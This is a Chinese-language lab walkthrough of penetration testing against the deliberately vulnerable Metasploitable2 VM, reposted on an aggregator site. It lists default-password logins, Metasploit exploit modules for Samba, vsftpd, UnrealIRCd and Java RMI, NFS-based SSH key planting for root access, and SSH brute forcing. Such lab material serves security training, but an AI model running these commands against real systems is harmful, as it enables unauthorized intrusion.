日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

metasploitable2渗透测试

發布時間:2023/12/1 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 metasploitable2渗透测试 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、系統弱密碼登錄

1、在kali上執行命令行telnet 192.168.26.129

2、Login和password都輸入msfadmin

3、登錄成功,進入系統

4、測試如下:

?

?

二、MySQL弱密碼登錄:

1、在kali上執行mysql –h 192.168.26.129 ?–u root

2、登錄成功,進入MySQL系統

3、測試效果:

?

三、PostgreSQL弱密碼登錄

1、在Kali上執行psql -h 192.168.26.129 –U postgres

2、輸入密碼:postgres

3、登錄成功,進入postgresql系統

測試效果

四、VNC弱密碼登錄

1、在kali圖形界面的終端中執行vncviewer 192.168.26.129

2、輸入密碼 password

3、登錄成功,進入系統

測試效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步驟

?1.在kali中執行msfconsole,啟動metasploit

?2.Use exploit/multi/samba/usermap_script,選擇漏洞庫

?3.Set RHOST 192.168.26.129 設置要攻擊的機器IP

?4.Exploit,開始攻擊

?5.利用成功,執行uname –a 驗證

測試效果:

?

六、Vsftpd源碼包后門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞

3、set RHOST 192.168.26.129

4、利用成功,執行uname –a 驗證

5、測試過程:

?

七、UnreallRCd后門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞

set RHOST 192.168.26.129 ,設置要攻擊的目標IP地址

3、開始攻擊

4、利用成功!使用uname –a 驗證

測試效果:

?

  • 八、Linux NFS共享目錄配置漏洞

問題:在(2)中需要創建 /tmp/test目錄并在目錄下創建,如未創建則不能進行下一步

步驟

  • 在kali上執行命令rpcinfo –p 192.168.26.129 ,查看nfs服務有無開啟
  • showmount –e 19168.26.129 查看其設置的遠程目錄列表
  • 輸入ssh-keygen 生成RSA公鑰
  • 依次輸入:
  • (1)mount –t nfs 192.168.26.129://tmp/test(預先創建),把192.168.160.131的根目錄掛載到/tmp/test/下;

    注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start 來啟動mount

    (2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下:

    (3)ssh? root@192.168.26.129,實現無密碼登錄

    九、Java RMI SERVER 命令執行漏洞(1099/tcp)

    1.Nmap –p 0-65535 192.168.26.129 來查看1099端口是否開啟

    2.進入msfconsole框架,依次輸入以下命令:

    1)use exploit/multi/misc/java_rmi_server

    2)set RHOST 192.168.26.129(靶機的IP地址)

    3)run

    4)session

    5)shell(進入meterpreter時執行)

    十、Root用戶弱口令漏洞(SSH爆破)

    步驟

  • 輸入nmap –sV? -O(大寫) 192.168.26.129 查看SSh端口是否開啟
  • 開啟metasploit framework 框架,依次輸入:
  • use auxiliary/scanner/ssh/ssh_login
  • set RHOSTS 192.168.26.129
  • set USERNAME root
  • set PASS_FILE? pass.txt(字典文件,需要預先生成)
  • set THREADS 50
  • run
  • 我在網上找了Metasploitable2? 靶機,下載了解壓出來,打開直接能用

    鏈接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
    提取碼:gx9z
    ?

    ?

    創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

    總結

    以上是生活随笔為你收集整理的metasploitable2渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。